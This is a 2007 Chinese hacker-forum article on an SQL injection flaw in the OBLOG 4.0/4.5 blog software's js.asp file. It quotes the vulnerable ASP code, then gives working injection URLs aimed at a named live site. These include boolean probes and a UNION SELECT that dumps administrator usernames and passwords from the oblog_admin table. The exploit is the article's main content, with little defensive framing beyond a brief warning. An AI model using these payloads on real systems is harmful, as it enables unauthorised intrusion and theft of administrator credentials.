黑客风云——风云网络
设为首页 加入收藏 我要投稿 网站地图
您现在的位置: 黑客风云 >> 黑客文章 >> 网管频道 >> 入侵检测 >> 文章正文
[推荐]OBLOG4.0,4.5版本通杀漏洞
        ★★★★★
OBLOG4.0,4.5版本通杀漏洞
文章整理发布:黑客风云 文章来源:www.05112.com 更新时间:2007-4-30

经测试漏洞确实存在,请广大使用此Blog的朋友们小心了!

漏洞文件:js.asp

以下是引用片段:
<%
Dim oblog
set oblog=new class_sys
oblog.autoupdate=False
oblog.start
dim js_blogurl,n
js_blogurl=Trim(oblog.CacheConfig(3))
n=CInt(Request("n"))
if n=0 then n=1
select case CInt(Request("j"))
case 1
call tongji()
case 2
call topuser()
case 3
call adduser()
case 4
call listclass()
case 5
call showusertype()
case 6
call listbestblog()
case 7
call showlogin()
case 8
call showplace()
case 9
call showphoto()
case 10
call showblogstars()
Case 11
Call show_hotblog()
Case 12
Call show_teams()
Case 13
Call show_posts()
Case 14
Call show_hottag()
case 0
call showlog()
end select
****************省略部分代码******************
Sub show_posts()
Dim teamid,postnum,l,u,t
teamid=Request("tid")
postnum=n
l=CInt(Request("l"))
u=CInt(Request("u"))
t=CInt(Request("t"))
Dim rs,sql,sRet,sAddon
Sql="select Top " & postnum & " teamid,postid,topic,addtime,author,userid From oblog_teampost where idepth=0 and isdel=0 "
If teamid<>"" And teamid<>"0″ Then
teamid=Replace(teamid,"|",",")
Sql=Sql & " And teamid In (" & teamid & ") "
End If
Sql=Sql & " Order by postid Desc"
Set rs=oblog.Execute(Sql)
sRet="

"
Do While Not rs.Eof
sAddon=""
* sRet=sRet & " " & oblog.Filt_html(Left(rs(2),l)) & ""
If u=1 Then sAddon=rs(4)
if t=1 Then
If sAddon<>"" Then sAddon=sAddon & ","
sAddon=sAddon & rs(3)
End If
If sAddon<>"" Then sAddon="(" & sAddon & ")"
sRet=sRet & sAddon & "

"
rs.Movenext
Loop
Set rs = Nothing
sRet=sRet & "

"
Response.write oblog.htm2js (sRet,True)
End Sub

调用show_posts()过程必须要符合上面的参数n=1,j=13
(" & teamid & ")
http://www.oblog.com.cn/js.asp?n=1&j=13&tid=1
http://www.oblog.com.cn/js.asp?n=1&j=13&tid=1) and 1=1 and (1=1 返回正常
http://www.oblog.com.cn/js.asp?n=1&j=13&tid=1) and 1=1 and (1=2 返回异常
猜管理员表名
http://www.oblog.com.cn/js.asp?n=1&j=13&tid=1) and 查询语句 and (1=1

Sql="select Top " & postnum & " teamid,postid,topic,addtime,author,userid From oblog_teampost where idepth=0 and isdel=0 "

http://www.oblog.com.cn/js.asp?n=1&j=13&tid=1) and 1=2 union select 1,2,3,4,5,6 from oblog_admin where id=(1

document.write('*');

gid=1跟pid=2里的1,2就是了 直接替换里面的1,2为username,password

http://www.oblog.com.cn/js.asp?n=1&j=13&tid=1) and 1=2 union select username,password,3,4,5,6 from oblog_admin where id=(1

文章录入:cainiaowang    责任编辑:cainiaowang 
  • 上一篇文章:

  • 下一篇文章: 没有了
    • 【字体: 】【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口
    VIP 专 区
    抽根憋闷烟的心声
    学习网页制作的理由
    加入终身会员的理由!!!
    学习黑客编程的5大理由
    学习免杀的6大理由
    学习软件破解的理由
    会员账号开通查询
    常见问题解答
    汇款向导
    学员报名咨询
    最 新 热 门
    关于phpwind 5.01-5.3 0day的分析04-09
    PPPOE验证缺陷所带来的危害03-21
    Ce-Admin新闻发布系统漏洞分析02-07
    Discuz漏洞分析11-28
    入侵检测PHP程序中的目录遍历漏洞10-12
    主流入侵检测产品大比较10-03
    一种新的带宽攻击方式(图)06-16
    Html标签带来的安全隐患06-05
    Javascript实现评估用户输入密码05-30
    针锋相对:主要的反NIDS技术应用05-22
    dvbbs7.1sp1最新漏洞的研究和利用05-13
    IE mhtml redirection漏洞利用方05-12
    相 关 文 章
  • 如何测试PERL漏洞代码

  • 0-day漏洞的防御

  • 轻易绕过PhpWind论坛程序高危漏洞攻防详

  • 《童年》推出全新封测版本 抢先体验

  • IPC$ 扫描和IPC$漏洞的防范

  • 微软又曝DNS服务漏洞 影响所有Windows服

  • 世纪热线完美版跨站漏洞提权入侵

  • 美国暴雪[魔兽世界] 官方程序漏洞

  • Microsoft Windows GDI内核本地权限提升

  • 利用ANI漏洞攻破VISTA系统[视频演示]

  • 入侵检测PHP程序中的目录遍历漏洞

  • 百度再现XSS高危漏洞

    • Copyright @2006 黑客风云 ●业务联系:QQ 联系怪人 联系奇人 Email:给怪人发邮件 给奇人发邮件
    ICP备案:冀06009886